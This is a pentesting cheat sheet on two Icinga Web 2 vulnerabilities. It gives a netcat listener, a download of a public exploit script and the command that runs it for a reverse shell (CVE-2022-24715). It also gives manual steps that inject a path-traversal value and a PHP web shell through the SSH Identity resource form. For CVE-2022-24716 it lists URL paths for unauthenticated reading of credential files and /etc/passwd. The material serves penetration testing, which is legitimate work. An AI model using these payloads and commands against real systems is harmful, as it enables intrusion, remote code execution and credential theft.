Icinga Web Pentesting

Remote Code Execution (CVE-2022-24715)

Authenticated user can execute arbitrary code.

Automation

This repository is available for reverse shell automatically.

In local machine, start a listener.

nc -lvnp 4444

Next create a PEM file and download the script, then execute it.

ssh-keygen -m pem
# Location: cert.pem
# Passphrase: (empty)

wget https://github.com/JacobEbben/CVE-2022-24715/blob/main/exploit.py
python3 exploit.py -t http://example.com/icingaweb2/ -I <local-ip> -P 4444 -u username -p password -e cert.pem

Manual Exploitation

*This content may not be working due to not enough verification.

1. Prepare Pem private key in local machine.

   ssh-keygen -m pem
   # Location cert.pem
   # Passphrase: (empty)

2. Login Icinga Web 2 and enter dashboard.

3. Go to Configuration → Application → Resources.

4. Click “Create a New Resource”.

5. In New Resource Window, select Resource Type “SSH Identity”.

6. Fill other field. For example,

   [Resource Name]
   evil
   
   [User]
   ../../../../../../../../../../../dev/shm/run.php
   
   [Private Key]
   <PEM_PRIVATE_KEY>
   \x00<?php system($_REQUEST["cmd"]);?>

   Regarding the Private Key field, copy the content of the PEM file we’ve generated and paste it, then followed by newline, “\x00” and PHP webshell code.

7. Click Save Resource.

Arbitrary File Disclosure (CVE-2022-24716)

Unauthenticated user can read arbitrary files. Assume the Icinga Web’s root directory is /icingaweb2.

/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/authentication.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/roles.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd

Also we can this script for automatically.

References

• SonarSource